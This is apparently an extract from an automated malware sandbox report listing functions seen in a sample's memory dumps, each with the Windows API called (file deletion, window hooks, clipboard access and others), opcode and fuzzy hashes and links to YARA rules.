                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014D51A2
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 34cba16bee7b5b6a93fe0837ab5cb559b8c7be728b4196581d3fcd1a7683a9cf
                                                          • Instruction ID: 3a78ee1ad1af0d9da49afc749862b364def44a2f1dded7b84a2e432384c56810
                                                          • Opcode Fuzzy Hash: 34cba16bee7b5b6a93fe0837ab5cb559b8c7be728b4196581d3fcd1a7683a9cf
                                                          • Instruction Fuzzy Hash: 7841BDB1D10248DFDF14CFAAC994ADEBBB5FF48314F24812AE819AB210DB749845CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D779C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 014D7F09
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 9ef9ca65ecf527d1898ec0b16c26e614e335ade386ac5bca40ccd5133a93fdb3
                                                          • Instruction ID: 7a087240cee6ca99bb72d03c1eba4e9ca19294b1cd2ee5922a9e42f2c2895407
                                                          • Opcode Fuzzy Hash: 9ef9ca65ecf527d1898ec0b16c26e614e335ade386ac5bca40ccd5133a93fdb3
                                                          • Instruction Fuzzy Hash: F1414CB5A00305CFDB14CF99C498BAABBF5FF48318F148459E519A7321C774A841CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0614B950, Relevance: 1.6, APIs: 1, Instructions: 96fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0614BA20
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: ef8562d9463b918d3654e941883080d5ba32d22ca4d4ffac57d2e6ada06a8a85
                                                          • Instruction ID: 8b59ae523138361e72fcc0824d8014fbad1f5759de9e877162be65e4cc1b476b
                                                          • Opcode Fuzzy Hash: ef8562d9463b918d3654e941883080d5ba32d22ca4d4ffac57d2e6ada06a8a85
                                                          • Instruction Fuzzy Hash: 3331C1B0D043499FCB10DFA9D405BEEBBF4EF49310F15856AE458A7351DB349944CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0614FB91, Relevance: 1.6, APIs: 1, Instructions: 86libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9817b0ad176509d5a7072fd7a4419b304e58fe22b92ddeafad8abfbb2e50b7f3
                                                          • Instruction ID: 68f2f282f1fe15d34cbf41307cd294f15f0291f8905281ab152f0f6565a1d72a
                                                          • Opcode Fuzzy Hash: 9817b0ad176509d5a7072fd7a4419b304e58fe22b92ddeafad8abfbb2e50b7f3
                                                          • Instruction Fuzzy Hash: 65319C31E00249DFCB54EBA5D4A4BAEBBB2AF85305F128479D401AB392DB359846CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014DC199, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEncodePointer.NTDLL(00000000), ref: 014DC222
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: EncodePointer
                                                          • String ID:
                                                          • API String ID: 2118026453-0
                                                          • Opcode ID: b2c518e44226b26556ef3bbffc678c39506387fd297d4789df1ecd0a1b71efa0
                                                          • Instruction ID: d0b311edc2902ae8f6749b6a9f88dcb3eccb6d5b1c9afd3d40e42af5a696608c
                                                          • Opcode Fuzzy Hash: b2c518e44226b26556ef3bbffc678c39506387fd297d4789df1ecd0a1b71efa0
                                                          • Instruction Fuzzy Hash: 6931CBB18053448FDB10DFA9EA4939EBFF4EB0A304F14846AE408A7352C7796904CFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0614D6CD, Relevance: 1.6, APIs: 1, Instructions: 78comclipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: Clipboard
                                                          • String ID:
                                                          • API String ID: 220874293-0
                                                          • Opcode ID: 87d83f22d3736bb18a1953405412299973bda52c08797e4e45821e315586a5ac
                                                          • Instruction ID: f1579fdf11cc53359fab4ee4d65cf6ef3f18972451e47afe581521f00cf1f872
                                                          • Opcode Fuzzy Hash: 87d83f22d3736bb18a1953405412299973bda52c08797e4e45821e315586a5ac
                                                          • Instruction Fuzzy Hash: 9E31F2B0E01248DFDB10DF99D984BCEBBF5AF48718F248429E504AB390D7B4A945CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06149238, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MoveFileExW.KERNELBASE(?,00000000,?,?), ref: 0614C038
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          • Opcode ID: 09ed8981d0165e5311f2d2d13f75383f27a50b28e37de9a215503f00fc480f58
                                                          • Instruction ID: d08e90deda5652abf7cae2f0934392f0dfdfc8e9861677133da0e3e18dca5813
                                                          • Opcode Fuzzy Hash: 09ed8981d0165e5311f2d2d13f75383f27a50b28e37de9a215503f00fc480f58
                                                          • Instruction Fuzzy Hash: 233125B6C022189FCB50DFA9D984ADEBBF4EF48310F14846AE808AB201D7759945CBE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0614D020, Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: Clipboard
                                                          • String ID:
                                                          • API String ID: 220874293-0
                                                          • Opcode ID: c0f0f5ef20134207af3592b2cd9d9c2ca897e2e972f3743a645a33cfa58e6702
                                                          • Instruction ID: 0013a43b69e99814ca0eb29e51a3012036782bf46497f6527daa3386acc7d5c9
                                                          • Opcode Fuzzy Hash: c0f0f5ef20134207af3592b2cd9d9c2ca897e2e972f3743a645a33cfa58e6702
                                                          • Instruction Fuzzy Hash: E83112B0E00248DFDB54DF98D984BCDBBF4AF48318F248429E104BB390D7B4A845CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06149250, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MoveFileExW.KERNELBASE(?,00000000,?,?), ref: 0614C038
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          • Opcode ID: a92e7b5de1b136d54ad72db1dee3360b36794034d677e637e140aea85fc0082c
                                                          • Instruction ID: 200a289598d2602c73b2c5f763b814910f374c60cf8f6cd20d3fd98de5c57926
                                                          • Opcode Fuzzy Hash: a92e7b5de1b136d54ad72db1dee3360b36794034d677e637e140aea85fc0082c
                                                          • Instruction Fuzzy Hash: 112130B6D022189FCB50DFA9D9846DEFBF4EB48310F14842AE818BB300D7759940CBE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0614C9E0, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,0614C9CF), ref: 0614CA67
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 5f2832c5801b61ef77258676bae5f962aed960847b5f03ee0de26e29386d7b47
                                                          • Instruction ID: cf1427cfe6da82ed38d1b040bb8aa0bf0797f84d0898b1186b5d2402926ec46d
                                                          • Opcode Fuzzy Hash: 5f2832c5801b61ef77258676bae5f962aed960847b5f03ee0de26e29386d7b47
                                                          • Instruction Fuzzy Hash: 57219DB19013489FCB10DFA9D845BDEBFF8EF49314F18445AD054B7211D738A944CBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06149210, Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0614BA20
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: c5e645c886b8d5a6a8c8e53379fe0f46ebe2d5b14356143703018293df2faee2
                                                          • Instruction ID: 1cb6cc2837035d0a666258090f7ed3a549e01c7ff3325a69d2ed3668e75ebeac
                                                          • Opcode Fuzzy Hash: c5e645c886b8d5a6a8c8e53379fe0f46ebe2d5b14356143703018293df2faee2
                                                          • Instruction Fuzzy Hash: DB2187B1C046599BCB10DFAAD544BEEBBB4EF08224F14856AD814B7640D738A944CFE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D6B62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014D6BEF
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 384b5529cd027a6cd9b751e2b1afe6df61ef3caf4f62d91c1d6776ec3eeb6910
                                                          • Instruction ID: 56ddbaa34a0813b55a3a714de50d0519d81572c2b6cdcb703bc7649d6e554ee2
                                                          • Opcode Fuzzy Hash: 384b5529cd027a6cd9b751e2b1afe6df61ef3caf4f62d91c1d6776ec3eeb6910
                                                          • Instruction Fuzzy Hash: A221E3B5900248DFDF10CFA9D584ADEBFF8EB48320F14842AE914A3350D378A954CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D6B68, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014D6BEF
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 64294b0479aeae6fe4874f46acb53900ea4b87a2e32e1de87d15462f3800efc4
                                                          • Instruction ID: 0ce0f14d13a5c516acfdf55a2d31b5ef0711579141a22652ceb2299136acecc4
                                                          • Opcode Fuzzy Hash: 64294b0479aeae6fe4874f46acb53900ea4b87a2e32e1de87d15462f3800efc4
                                                          • Instruction Fuzzy Hash: 8A21C4B5900248DFDF10CFA9D584ADEBBF8EB48324F14842AE914A3310D378A954CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D4080, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014D4116
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 6a6d3ec990f182fba6777b274901296562e8f5a1322f378e9874ade006185530
                                                          • Instruction ID: cb808708defb1be2e248855f74dec01f1a71ff60e6c4acfa2deb0959f043594c
                                                          • Opcode Fuzzy Hash: 6a6d3ec990f182fba6777b274901296562e8f5a1322f378e9874ade006185530
                                                          • Instruction Fuzzy Hash: 082115B2D006488FDB14CFAAC44878EFBF4EF88314F28856AD419A7710D375A546CFA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06149228, Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0614BA20
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 308f00c18aca7c2ce7e9153826a9e2398dfdad5db16eb2285c6b73e3ebe2e4a2
                                                          • Instruction ID: 297ab48f7ccb8106c3bcbeee8f5f2702818cf888879123221bc50738645eebf5
                                                          • Opcode Fuzzy Hash: 308f00c18aca7c2ce7e9153826a9e2398dfdad5db16eb2285c6b73e3ebe2e4a2
                                                          • Instruction Fuzzy Hash: 992133B1D046599BCB14DF9AC5447EEFBF4FF08224F14852AD818B7240D738A954CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05302671, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 053026F3
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: 9fdfbee8c311d9f76f438fea4d9a795a990b4d645593e03532c438c4e7df58c0
                                                          • Instruction ID: 4dedd1f4541627b1a39e467ff4cb83699d99156d6b743e5bda0af61639065359
                                                          • Opcode Fuzzy Hash: 9fdfbee8c311d9f76f438fea4d9a795a990b4d645593e03532c438c4e7df58c0
                                                          • Instruction Fuzzy Hash: AC2129B5900248DFDB14DF99C944BEEFBF5FB88314F14842AE415A7250DBB4A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05302678, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 053026F3
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: fc666fee73e66897ab5b616b19c7fc629dcc784850e228d8792a5343996f7099
                                                          • Instruction ID: ac6c18abe1cdedf6dae1debdff87d354523cf7397a7c5f5f583d7720ff79b74e
                                                          • Opcode Fuzzy Hash: fc666fee73e66897ab5b616b19c7fc629dcc784850e228d8792a5343996f7099
                                                          • Instruction Fuzzy Hash: 092124B5900208CFCB14CF9AC848BEEFBF5FB88314F14842AE419A7250CB74A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0530C0C8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0530C0A9,00000800), ref: 0530C13A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: eb021cb8235b4ab4ddbb652e10147304dd0a071c5d17291a6fc19f66b760c0ec
                                                          • Instruction ID: 07dd3d1d622c817d4af4f4dc82427a301a1bf6cd0df705555c82f07f84f5114c
                                                          • Opcode Fuzzy Hash: eb021cb8235b4ab4ddbb652e10147304dd0a071c5d17291a6fc19f66b760c0ec
                                                          • Instruction Fuzzy Hash: 9011F4B69002498FDB14CFAAC444BDEFBF4EB59324F14852AD415A7340C379A945CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0530AE5C, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0530C0A9,00000800), ref: 0530C13A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 70cabc04bfbf2256891760d699422b54285888bf8856cbfac60dc2c9376dfc51
                                                          • Instruction ID: 85be9964ce773ac4bc7297efc6f664b1bcbfe1b9c6e9a71e06ca89c86da69abe
                                                          • Opcode Fuzzy Hash: 70cabc04bfbf2256891760d699422b54285888bf8856cbfac60dc2c9376dfc51
                                                          • Instruction Fuzzy Hash: F011F2B69003098BDB14CF9AC844BDEFBF8EB48314F14952AE919A7740C378A945CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014DC1A8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEncodePointer.NTDLL(00000000), ref: 014DC222
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: EncodePointer
                                                          • String ID:
                                                          • API String ID: 2118026453-0
                                                          • Opcode ID: 6a10546e0409292d9af6ed3955cf4db1de4f501e8520803c16a341f615d67bf1
                                                          • Instruction ID: 341061ba85dc22835e2b298614d141e6ea4314a72eba6c3629387fd447e68085
                                                          • Opcode Fuzzy Hash: 6a10546e0409292d9af6ed3955cf4db1de4f501e8520803c16a341f615d67bf1
                                                          • Instruction Fuzzy Hash: D31147B19002458FDF10DFA9D64879EBFF4EB4A314F24842AD809B3641C739A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05301638, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 053016A7
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID:
                                                          • API String ID: 1890195054-0
                                                          • Opcode ID: 8f33eecda796e08f7799b4e599195d8c5825a657e86800116015c62d2d1ab109
                                                          • Instruction ID: 5f6367d9c6c387a56161304373e674fad8bd7117efc9ef474f747d570d5fbd14
                                                          • Opcode Fuzzy Hash: 8f33eecda796e08f7799b4e599195d8c5825a657e86800116015c62d2d1ab109
                                                          • Instruction Fuzzy Hash: AB11F2B1D006599FCB10CFAAD944BDEFBF4AF48324F18852AD818B7240D378A955CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D3300, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014D4116
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: dd27844773a4e00c9b430a9d8983a5843c18aab1b0ca8a568bdb333477c631b3
                                                          • Instruction ID: 0ab598be5bbb17418cfb4d6328d93603ee7349c6658d4e9ed9965760626729f6
                                                          • Opcode Fuzzy Hash: dd27844773a4e00c9b430a9d8983a5843c18aab1b0ca8a568bdb333477c631b3
                                                          • Instruction Fuzzy Hash: 0E11F3B19006498BDB10CF9AC448BDEBBF4EB49214F14842AD919B7610D379A545CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 061492D4, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,0614C9CF), ref: 0614CA67
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: fcae9072b95e04eb96c4521bea76cf8ab770038145ea9dff0b1a98523b0a8c0d
                                                          • Instruction ID: 696d81615ee47fe2fe40a0c63688f1220c70099ca636d530adad15e3a488ad3d
                                                          • Opcode Fuzzy Hash: fcae9072b95e04eb96c4521bea76cf8ab770038145ea9dff0b1a98523b0a8c0d
                                                          • Instruction Fuzzy Hash: B41113B1900248CFCB10DFAAC544BDEBBF8EF48224F24882AD519A7310D774A944CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D40AA, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014D4116
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 08d4dff010d754ecb52c52c2b0f1272518138528691d0ee032c8ce30632ac908
                                                          • Instruction ID: 4a2e262be3168e7eea56c8149589b212f7ad006526945e1fc5822099ee596dfe
                                                          • Opcode Fuzzy Hash: 08d4dff010d754ecb52c52c2b0f1272518138528691d0ee032c8ce30632ac908
                                                          • Instruction Fuzzy Hash: A81102B2D00649CFDB10CFAAD548BDEFBF4EB48224F14842AD559B7610C379A545CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0614CF0C, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 0614D5E5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: caee24cf59049172614955cde791b326b996498151e42289c863ed10c8edfadc
                                                          • Instruction ID: 87d431a7f14e4beca13d538d21da3e3435f689692ae344c6da61b6bf90f7b707
                                                          • Opcode Fuzzy Hash: caee24cf59049172614955cde791b326b996498151e42289c863ed10c8edfadc
                                                          • Instruction Fuzzy Hash: 8611F2B1D00249CFDB10DF99D548BDEBBF8EB48224F148869D519A7600D778A944CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0614D589, Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 0614D5E5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: baffa20efe601eabfa0a7905c7ee5d02d7f2f9037d17f62488a2eb75ae4e3f55
                                                          • Instruction ID: e7add60c3bd930ded5f8a951029b1522383a7479aaac71e396e1a118c64aa8e7
                                                          • Opcode Fuzzy Hash: baffa20efe601eabfa0a7905c7ee5d02d7f2f9037d17f62488a2eb75ae4e3f55
                                                          • Instruction Fuzzy Hash: 041103B1900649CFDB10DF99D544BDEBBF4EB48324F248859D559B7600C738A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0117D450, Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.821165543.000000000117D000.00000040.00000001.sdmp, Offset: 0117D000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8886ada1f7485558f0174bd461c0bbbebbda90873b628d110f2076b17f2f433c
                                                          • Instruction ID: 82b394b66d83128e2c550e4849dee5553f93501a0ef5f4436682583943edba85
                                                          • Opcode Fuzzy Hash: 8886ada1f7485558f0174bd461c0bbbebbda90873b628d110f2076b17f2f433c
                                                          • Instruction Fuzzy Hash: 6D212471504208DFDF19DF94E9C4B67BB75FF88324F248569E8060B706C336E446C6A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0118D01C, Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.821227131.000000000118D000.00000040.00000001.sdmp, Offset: 0118D000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 60162c17b53d32a99aa3f39cebd52c0c8d5530283610505b2a514d5697770f2f
                                                          • Instruction ID: 34e961d7c5a15931f3b26671f3c4610880f49ebeae56523d0ffbc4bc5587b71a
                                                          • Opcode Fuzzy Hash: 60162c17b53d32a99aa3f39cebd52c0c8d5530283610505b2a514d5697770f2f
                                                          • Instruction Fuzzy Hash: 21212571504300DFDF19EF94E9C4B16BBA5FB84354F20CAA9D8094B386C736D847CA62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0117D44B, Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.821165543.000000000117D000.00000040.00000001.sdmp, Offset: 0117D000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f631457aaa0c6e4f3cb4a4e067b6acc4795b38dac437016503b326b5a78a0402
                                                          • Instruction ID: 9be71c89a850d65b049572e95c81ab0962909ff76e56c81b3067b7cafffde290
                                                          • Opcode Fuzzy Hash: f631457aaa0c6e4f3cb4a4e067b6acc4795b38dac437016503b326b5a78a0402
                                                          • Instruction Fuzzy Hash: 5511AC76504284DFDF16CF54E9C4B16BF71FB84324F2886A9D8050B756C33AD45ACBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0118D017, Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.821227131.000000000118D000.00000040.00000001.sdmp, Offset: 0118D000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32bacf70451705ea961c6d5f0b109703adc9f0fbd3f1c5808569d94555b5c9bf
                                                          • Instruction ID: df33ea9ec99aee54afc307abddf7621291cd3d7b12beb4d434f16a5bdbc3e5fe
                                                          • Opcode Fuzzy Hash: 32bacf70451705ea961c6d5f0b109703adc9f0fbd3f1c5808569d94555b5c9bf
                                                          • Instruction Fuzzy Hash: E411BB75504380CFDB16DF54E5C4B16BBA1FB84324F28C6AAD8494B696C33AD44BCFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 014DDA01, Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D0m
                                                          • API String ID: 0-3635740809
                                                          • Opcode ID: 557e1e14e03ff721e7248f84845321b0675aec899d2977da05a401fb9957ee84
                                                          • Instruction ID: c657383dc7dba78c5466f5dd99a55adf47954c07946c7e62903474371c700f67
                                                          • Opcode Fuzzy Hash: 557e1e14e03ff721e7248f84845321b0675aec899d2977da05a401fb9957ee84
                                                          • Instruction Fuzzy Hash: 50818334F101148BCF189BB998646BE7AB7AFC8614F088D2EE517D7389DF349C428B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

